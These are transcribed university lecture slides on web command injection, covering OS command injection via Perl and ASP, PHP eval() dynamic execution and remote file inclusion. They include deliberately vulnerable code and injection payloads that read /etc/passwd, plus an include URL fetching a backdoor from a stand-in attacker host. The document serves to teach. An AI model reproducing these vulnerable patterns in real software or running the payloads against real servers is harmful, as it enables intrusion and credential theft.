Software Security

Download Report

Transcript Software Security

Software Security
Lecture 4
Fang Yu
Dept. of MIS,
National Chengchi University
Spring 2011
Outline

Today we will have Adam presenting how to
attack authentications (Ch6)

Before his presentation, I will continue
Command Injections (Ch9), and also I will
present my recent research on how to prevent
and remove injection vulnerabilities

The rest of your presentations have been
scheduled. Please check the course web page
and plan ahead. Let me know if you have any
question.

The course website :

http://soslab.nccu.edu.tw/Courses.html
Injecting Code II
Chapter 9
The Web Application Hacker’s
Handbook
Interpreted Languages


Recall that an interpreted language is one
whose execution involved a runtime
component that interprets the code of the
language and carries out the instructions
that it contains
For example, SQL, Perl, ASP, PHP, etc.
Interpreted Languages

In most applications, the code processed by
the interpreter is a mix of instructions written
by a programmer and data supplied by a
user.

An attacker can supply crafted input that
breaks out of the data context, usually by
supplying some syntax that has a special
significance within the grammar of the
interpreted language.
Command Injection Attacks

Main problem: Incorrect or completely lack
of validation of user input that results in the
execution of commands on the server

We have discussed SQL injections last
week. Today we will discuss OS command,
Web scripting language, SOAP and SMTP
injection attacks.
OS command: Injecting via
Perl

Consider a Perl CGI Code that allows
administrators to specify a directory and
view a summary of its disk usages
#!/usr/bin/perl
use strict;
use CGI qw(:standard escapeHTML);
print header, start_html(“”);
print “<pre>”;
my $command = “du -h --exclude php*
/var/www/html”;
$command= $command.param(“dir”);
$command=`$command`;
print “$command\n”;
print end_html;

When used as intended:
Injecting via Perl

“|” is used to redirect the output of a process
to the input of another process

This enables multiple commands to be
chained together

Inject code: (cat /etc/passwd)
OS Command: Injecting via ASP

Consider an ASP code that allows administrators to
view the contents of a requested log file

type the log file

cmd executes the command
<%
Set oScript = Server.CreateObject(“WSCRIPT.SHELL”)
Set oFileSys = Server.CreateObject(“Scripting.FileSystemObject”)
szCMD = “type c:\inetpub\wwwroot\logs\“ & Request.Form(“FileName”)
szTempFile = “C:\“ & oFileSys.GetTempName()
Call oScript.Run (“cmd.exe /c “ & szCMD & “ > “ & szTempFile, 0, True)
Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
%>

When used as intended: (submit last5.log)

Use && to batch multiple commands together

Last5.log && dir c:\
Dynamic Execution
Vulnerabilities

The PHP function eval() is used to
dynamically execute code that is passed to
the function at runtime

Consider a search function that enables
users to create stored searches:
https://wahhapp.com/search.php?storedsearch=\$myse
arch%3dwahh

The server side implementation:

creating a mysearch variable with the
value wahh
$storedsearch = $_GET[‘storedsearch’];
eval(“$storedsearch;”);
Dynamic execution in PHP

The semicolon character can be used to
batch commands together in a single
parameter.

For example, to retrieve the contents of the
file /etc/password, you could use either the
file_get_contentsor the system command:
https://wahhapp.com/search.php?storedsearch=\$mysearch%3
dwahh;
%20echo%20file_get_contents(‘/etc/passwd’)
https://wahhapp.com/search.php?storedsearch=\$mysearch%3
dwahh;
%20system(‘cat%20/etc/passwd’)
File Inclusion Attacks

Consider an application that delivers
different content to people in different
locations

A request looks like:
https://wahh-app.com/main.php?Country=US

The application processes as follows:
$country = $_GET[‘Country’];
include( $country . ‘.php’ );
File Inclusion Attacks

If the request has been intercepted:
https://wahhapp.com/main.php?Country=http://wahhattacker.com/backdoor

The sever side may include an arbitrary
remote file
$country = $_GET[‘Country’];
include(http://wahh-attacker.com/backdoor
.‘.php’ );
Quiz

What’s the main cause of injection
vulnerabilities?

How to prevent injection vulnerabilities?

Let’s talk a little bit about Stranger
Next week

We will have Juilette presenting Attacking
Session Management (Chapter 7), Jorina
presenting Attacking Access Controls
(Chapter 8)

We will also have Hsing Hunag presenting
Burp Suite, a tool set for analyzing and
attacking web applications